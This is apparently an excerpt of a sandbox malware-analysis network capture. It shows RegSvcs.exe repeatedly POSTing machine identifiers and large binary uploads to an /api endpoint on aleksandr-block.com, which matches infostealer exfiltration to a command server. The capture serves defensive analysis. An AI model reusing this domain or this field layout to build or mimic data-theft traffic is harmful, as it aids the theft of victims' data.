                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 67 36 43 62 6d 55 55 72 4e 4a 50 34 6b 65 54 46 2b 47 73 6e 71 37 4f 48 37 46 52 78 6b 78 47 6d 54 36 38 36 50 66 31 35 72 7a 4c 44 6f 4e 62 65 5a 53 63 34 67 50 69 4c 74 2f 76 32 61 51 75 6a 6f 74 48 77 5a 44 7a 43 46 2f 41 45 2b 6b 4e 71 2f 58 6d 37 4d 73 4f 67 37 4e 35 7a 49 77 32 56 37 6f 37 6d 76 72 74 69 50 2b 7a 39 68 38 30 72 4c 64 41 4f 76 77 44 6d 50 57 54 6c 5a 35 30 79 6b 50 62 45 79 57 59 32 4b 5a 76 7a 6c 70 69 77 6f 7a 46 37 2f 76 65 56 6f 58 52 2f 7a 43 48 79 54 2f 5a 44 66 49 52 6e 34 32 54 62 75 4a 47 58 4a 54 4a 69 7a 72 2f 41 70 65 4c 70 59 79 71 36 70 6f 44 4e 56 52 6a 46 46 4c 73 66 38 42 51 72 2f 54 44 6a 66 64 75 34 2b 70 6c 73 4a 7a 6d 48 36 59 71 32 39 37 74 61 5a 2b 79 39 68 36 73 72 43 74 41 51 73 67 6a 68 45 6d 6d 61 61 4b 6c
                                                                              Data Ascii: g6CbmUUrNJP4keTF+Gsnq7OH7FRxkxGmT686Pf15rzLDoNbeZSc4gPiLt/v2aQujotHwZDzCF/AE+kNq/Xm7MsOg7N5zIw2V7o7mvrtiP+z9h80rLdAOvwDmPWTlZ50ykPbEyWY2KZvzlpiwozF7/veVoXR/zCHyT/ZDfIRn42TbuJGXJTJizr/ApeLpYyq6poDNVRjFFLsf8BQr/TDjfdu4+plsJzmH6Yq297taZ+y9h6srCtAQsgjhEmmaaKl
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 74 55 6c 62 6d 4b 44 39 49 75 67 2f 65 34 71 4f 4c 71 6d 30 66 51 6e 4e 38 49 54 73 45 2f 49 54 57 53 6c 50 76 73 79 72 75 50 4e 31 32 49 32 4d 39 76 66 6a 4b 72 7a 39 32 51 75 37 4f 75 48 39 53 74 6e 67 46 44 38 43 2b 5a 44 66 4f 30 73 2b 43 66 49 74 35 4f 4c 65 6d 34 37 31 75 6e 48 2f 71 4b 31 4a 54 76 73 2f 59 65 30 61 43 33 42 47 4c 38 5a 39 45 51 61 67 33 2b 75 66 64 66 75 79 4e 6c 69 4d 44 53 4e 73 34 2b 6c 36 75 46 62 46 34 65 70 77 66 52 78 4f 4e 55 34 6e 45 2b 35 51 79 76 39 4a 70 6f 79 30 36 44 38 6c 79 55 34 59 73 36 2f 73 71 58 2b 39 57 49 2f 76 65 6a 76 30 46 45 46 6b 54 4b 37 47 72 55 33 49 36 31 76 71 48 2b 58 6f 49 32 5a 59 32 42 36 78 72 48 48 6f 75 47 37 50 58 6e 2b 2f 70 4b 67 50 47 2b 42 41 66 49 57 74 78 56 6b 35 53 7a 74 4d 6f 6d 67
                                                                              Data Ascii: tUlbmKD9Iug/e4qOLqm0fQnN8ITsE/ITWSlPvsyruPN12I2M9vfjKrz92Qu7OuH9StngFD8C+ZDfO0s+CfIt5OLem471unH/qK1JTvs/Ye0aC3BGL8Z9EQag3+ufdfuyNliMDSNs4+l6uFbF4epwfRxONU4nE+5Qyv9Jpoy06D8lyU4Ys6/sqX+9WI/vejv0FEFkTK7GrU3I61vqH+XoI2ZY2B6xrHHouG7PXn+/pKgPG+BAfIWtxVk5SztMomg
                                                                              2025-01-14 17:01:14 UTC1369INData Raw: 42 36 78 62 48 48 74 4c 43 6a 4a 57 36 69 71 4d 62 77 5a 54 7a 42 44 4c 6f 4d 34 51 42 6a 67 30 43 47 66 35 62 6c 7a 64 35 62 48 67 4f 63 37 34 71 70 39 37 6c 46 4c 72 71 6d 2b 63 31 63 4c 74 51 4f 2f 69 6e 30 46 53 66 39 4d 4f 4e 71 32 37 69 44 2b 47 38 77 4c 35 6e 34 78 59 62 33 37 57 5a 70 34 75 58 44 73 7a 4e 2f 39 68 4f 78 43 76 6b 45 5a 70 78 30 73 33 2b 55 35 34 48 35 59 6a 59 68 31 72 48 48 71 72 43 6a 4a 53 69 6d 74 63 72 38 62 48 50 55 42 4c 74 50 75 55 4d 71 2f 53 62 6a 63 35 48 77 7a 74 5a 69 62 43 53 59 38 63 65 35 76 75 49 6c 50 2b 7a 39 6c 4c 30 72 4c 5a 4e 47 2f 45 6a 30 45 54 61 37 66 62 56 78 33 4e 37 39 39 48 63 6e 4d 70 57 39 74 71 76 30 37 58 41 71 76 4b 4c 35 7a 55 59 74 31 41 36 2f 54 63 59 56 4a 37 31 77 70 44 4c 56 6f 4e 75 5a 50
                                                                              Data Ascii: B6xbHHtLCjJW6iqMbwZTzBDLoM4QBjg0CGf5blzd5bHgOc74qp97lFLrqm+c1cLtQO/in0FSf9MONq27iD+G8wL5n4xYb37WZp4uXDszN/9hOxCvkEZpx0s3+U54H5YjYh1rHHqrCjJSimtcr8bHPUBLtPuUMq/Sbjc5HwztZibCSY8ce5vuIlP+z9lL0rLZNG/Ej0ETa7fbVx3N799HcnMpW9tqv07XAqvKL5zUYt1A6/TcYVJ71wpDLVoNuZP


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049728188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:14 UTC281OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=NKJ1O0YHINCT89
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12823
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:14 UTC12823OUTData Raw: 2d 2d 4e 4b 4a 31 4f 30 59 48 49 4e 43 54 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 4e 4b 4a 31 4f 30 59 48 49 4e 43 54 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 4b 4a 31 4f 30 59 48 49 4e 43 54 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 0d 0a 2d 2d 4e 4b 4a 31 4f 30 59 48
                                                                              Data Ascii: --NKJ1O0YHINCT89Content-Disposition: form-data; name="hwid"FE2106E6753D8C67E2FCF1EEA745798E--NKJ1O0YHINCT89Content-Disposition: form-data; name="pid"2--NKJ1O0YHINCT89Content-Disposition: form-data; name="lid"DUkgLv--PISYA--NKJ1O0YH
                                                                              2025-01-14 17:01:15 UTC1132INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=i8qfd46bu72nug7p75gedl0qog; expires=Sat, 10 May 2025 10:47:54 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u8iOjX2gmw5G9rlCf86xBLP0EUvPaPSinnauJ3Uiwupw2Vhp%2FYCxBZjMRNjj7%2Bs3r7%2B13bVtjlOjtJ3N%2FtVN2jpdqDZ7H%2FlD4D0WU3fDCg0N1ZzcSn2SgcqMtxVqtqRQbfMoAMKC"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fd809a04283-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=604&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13762&delivery_rate=1811414&cwnd=242&unsent_bytes=0&cid=55c1c6b00bcbb8f3&ts=953&x=0"
                                                                              2025-01-14 17:01:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-14 17:01:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049737188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:16 UTC277OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=9ILC58YHXF
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 15026
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:16 UTC15026OUTData Raw: 2d 2d 39 49 4c 43 35 38 59 48 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 39 49 4c 43 35 38 59 48 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 49 4c 43 35 38 59 48 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 0d 0a 2d 2d 39 49 4c 43 35 38 59 48 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                              Data Ascii: --9ILC58YHXFContent-Disposition: form-data; name="hwid"FE2106E6753D8C67E2FCF1EEA745798E--9ILC58YHXFContent-Disposition: form-data; name="pid"2--9ILC58YHXFContent-Disposition: form-data; name="lid"DUkgLv--PISYA--9ILC58YHXFContent-
                                                                              2025-01-14 17:01:16 UTC1128INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8f64q8hlj4r9k7o945igciitn0; expires=Sat, 10 May 2025 10:47:55 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8cyA520YtqGkxjfkBqReG5NDA2ySuyDqdy%2BNY1MOVSekW3VX%2FDoBVKBwkkvidjoFDYLl%2ByQK3vtTAUWwOJCuF3uqZbUkdh77TQ2ANDIW3tb3gdSAGcEcuCp3FkWCtOPYImfU2AJC"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fe1eec572b3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=1781&rtt_var=1157&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15961&delivery_rate=780957&cwnd=172&unsent_bytes=0&cid=4ee0ca01a64644fc&ts=505&x=0"
                                                                              2025-01-14 17:01:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-14 17:01:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049745188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:17 UTC285OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=LXMO8YRWF56EDZ7QNE
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20436
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:17 UTC15331OUTData Raw: 2d 2d 4c 58 4d 4f 38 59 52 57 46 35 36 45 44 5a 37 51 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 4c 58 4d 4f 38 59 52 57 46 35 36 45 44 5a 37 51 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 58 4d 4f 38 59 52 57 46 35 36 45 44 5a 37 51 4e 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41
                                                                              Data Ascii: --LXMO8YRWF56EDZ7QNEContent-Disposition: form-data; name="hwid"FE2106E6753D8C67E2FCF1EEA745798E--LXMO8YRWF56EDZ7QNEContent-Disposition: form-data; name="pid"3--LXMO8YRWF56EDZ7QNEContent-Disposition: form-data; name="lid"DUkgLv--PISYA
                                                                              2025-01-14 17:01:17 UTC5105OUTData Raw: 00 00 00 00 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00
                                                                              Data Ascii: `?lpQ0/74G6(~`~O
                                                                              2025-01-14 17:01:17 UTC1129INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=rcjmfpbvcpcbf53kl5511sk099; expires=Sat, 10 May 2025 10:47:56 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtQ82W9MaRX3NLWAQPKKyOMEw0lf1D8TU%2Bdk6ECrnSXyjC9QYMXwi%2FqH8F7NckgaA2q3PReFOnDmnQWgrqCxU4NBs7q%2BwLhDi36GNrBBcDoDHVm9rmwVRTHSXUGudpcmBivRzirP"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fe8a8f0436d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2461&min_rtt=2454&rtt_var=925&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21401&delivery_rate=1189894&cwnd=162&unsent_bytes=0&cid=2e37b7821c4648e6&ts=497&x=0"
                                                                              2025-01-14 17:01:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-14 17:01:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1049751188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:18 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=M4F5EDKMPZFTEN
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1212
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:18 UTC1212OUTData Raw: 2d 2d 4d 34 46 35 45 44 4b 4d 50 5a 46 54 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 4d 34 46 35 45 44 4b 4d 50 5a 46 54 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 34 46 35 45 44 4b 4d 50 5a 46 54 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 0d 0a 2d 2d 4d 34 46 35 45 44 4b 4d
                                                                              Data Ascii: --M4F5EDKMPZFTENContent-Disposition: form-data; name="hwid"FE2106E6753D8C67E2FCF1EEA745798E--M4F5EDKMPZFTENContent-Disposition: form-data; name="pid"1--M4F5EDKMPZFTENContent-Disposition: form-data; name="lid"DUkgLv--PISYA--M4F5EDKM
                                                                              2025-01-14 17:01:18 UTC1130INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e0j39n4f3qvfjf7vqk3imub41q; expires=Sat, 10 May 2025 10:47:57 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ta9GYBPhbXtptbytn4yJU%2BI895wPt6KI14xmx5wdWd121DfqnpNzoqItm%2FKx%2FwP6JZndxrJWKwn9x7B0UgWKFe6vc2opA1Xl%2BsdLsS%2Bq5elNh0ZbYMD5Ccfk1aatT2Ktl5AAZ8dK"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2fef29cd0f49-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1541&rtt_var=881&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2128&delivery_rate=1894873&cwnd=215&unsent_bytes=0&cid=738ba3f7ec5b826b&ts=471&x=0"
                                                                              2025-01-14 17:01:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-14 17:01:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1049761188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:19 UTC277OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=IR3AP3E77
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 590322
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: 2d 2d 49 52 33 41 50 33 45 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45 0d 0a 2d 2d 49 52 33 41 50 33 45 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 52 33 41 50 33 45 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 0d 0a 2d 2d 49 52 33 41 50 33 45 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                              Data Ascii: --IR3AP3E77Content-Disposition: form-data; name="hwid"FE2106E6753D8C67E2FCF1EEA745798E--IR3AP3E77Content-Disposition: form-data; name="pid"1--IR3AP3E77Content-Disposition: form-data; name="lid"DUkgLv--PISYA--IR3AP3E77Content-Disp
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: e0 0e b1 87 8e be ae c3 45 1f 3d a6 cc e5 bc 66 3f 6a 60 80 d2 7c 4d 11 23 d0 59 80 79 7b e0 98 a0 3c 73 a8 e5 b7 6f be 29 d5 2c 68 22 65 41 04 09 8b c0 fa 0a bd 1d 51 7e 7e fc c0 52 0d ab 85 eb c0 58 9c 43 6b a6 93 be 28 bf be 29 d2 95 12 ec 88 c0 d8 f7 c0 eb 35 2d ef ee ef ad e6 35 d9 c0 eb 53 3b 98 c3 81 47 c6 94 5c 16 22 e4 f8 81 08 5d bf ce 10 8d f5 4e 60 e6 19 f9 88 a0 38 7b 86 69 2a 31 f0 76 8c c1 99 0e 6b 88 7e 58 b2 97 0f 5c 4e 4a 77 70 c3 81 26 39 8e ad 31 3a 56 24 d3 a1 14 92 55 81 29 22 dc 22 0d aa 1f fb 73 4a 78 dc 17 04 a1 76 49 7a 39 72 a0 98 e1 30 c1 ac e5 49 95 9d 29 cd 78 4a 95 99 8c fa 20 2c cd 28 02 d6 ae 3b d3 45 c5 98 c2 f3 98 79 a3 d4 ed a6 00 17 39 56 bd a3 20 87 b4 26 57 c3 78 90 e1 1d 7c 48 90 4c a2 22 3e 85 77 4b 72 ad 3b 08 d6
                                                                              Data Ascii: E=f?j`|M#Yy{<so),h"eAQ~~RXCk()5-5S;G\"]N`8{i*1vk~X\NJwp&91:V$U)""sJxvIz9r0I)xJ ,(;Ey9V &Wx|HL">wKr;
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: 32 ab 76 a5 a6 e2 4d 1b e2 4d 65 17 86 35 6a 69 72 18 58 65 8b 3a 6d ae 22 60 af cc 53 10 5f 6d f1 cd 3c 33 d8 6b 1b 42 72 94 35 57 1f 68 1a 73 de 3c 43 15 f0 b0 0c 1a 5c fe c3 a7 d2 54 36 98 2a f4 64 49 fe 37 a6 08 c2 31 83 83 2c d5 09 de 71 8b 56 4a 55 71 bb e8 21 0a c6 99 66 b1 ba 68 12 6a e3 c5 a7 95 ef b2 eb b5 62 37 94 e8 fa 93 f2 0d 77 a7 51 0d 65 e5 db 3a 0b 09 b9 46 1e c4 bd 2a 9f e2 aa f5 44 48 2c af af 26 24 0f 5c 6e 19 56 a2 fb 9f d0 8e b2 ac 15 ae 57 fa d9 ec 2c ba 1a 0e 23 c6 39 f3 88 bb f7 45 6b 9b 1c 0d 0e f2 5d f8 f1 23 74 66 ee 5c 4c c6 7c 89 26 e0 81 a6 a5 bb 96 13 50 a4 d6 57 35 7d 5b 2d 52 c8 df d4 71 87 64 16 d2 bd d9 74 56 10 55 f7 87 dd d7 76 a5 86 90 7d ac d1 54 e7 75 85 b1 46 d4 c4 15 60 f5 90 42 98 23 ac 4a fe 2c 22 9d 71 76 98
                                                                              Data Ascii: 2vMMe5jirXe:m"`S_m<3kBr5Whs<C\T6*dI71,qVJUq!fhjb7wQe:F*DH,&$\nVW,#9Ek]#tf\L|&PW5}[-RqdtVUv}TuF`B#J,"qv
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: d7 b6 c0 e2 47 db 76 a3 fa 4d 18 8e 79 bb 72 b8 e6 a3 2d 8f f7 43 df cf 1f ce 2a c3 a9 1b d5 92 4c f8 b7 d9 5a af 1e 80 3b a5 09 36 40 45 7a 79 e3 50 38 65 3d ec f0 43 be 14 c6 39 08 65 e6 ee 07 dc 8f f4 59 cc 0a 51 32 ac fe c4 e4 aa 3c 99 6b 54 de 37 d0 f9 d1 b7 e5 92 52 38 53 55 01 eb 33 66 df ba 42 e2 cd 70 db ff ea 58 e5 32 45 22 43 88 0f f7 61 60 91 b1 bc a6 a5 1c 4d 66 7d e6 06 7c a7 ae e3 33 4c 00 36 63 2b 3e cd aa 9d 3d f9 de b5 f8 3a 97 2c b9 c9 69 af bb aa 77 2c ef 62 94 a8 49 a9 8f 9f fb 7c 13 7a 75 cf 6d ca b4 ab 95 14 72 73 fc 03 91 0b e8 73 7f 02 c5 b0 6e c6 4d 0d 84 2a 3d e8 83 67 33 58 dc 0e a5 fb 6b 60 da 49 f1 56 53 65 02 f3 44 03 47 39 8e 72 9c 56 55 44 07 4f 2b a5 ce 05 72 45 e6 53 e1 39 f8 21 ad e6 67 5c ca 5f 55 9f b5 b0 ca a3 5e 06
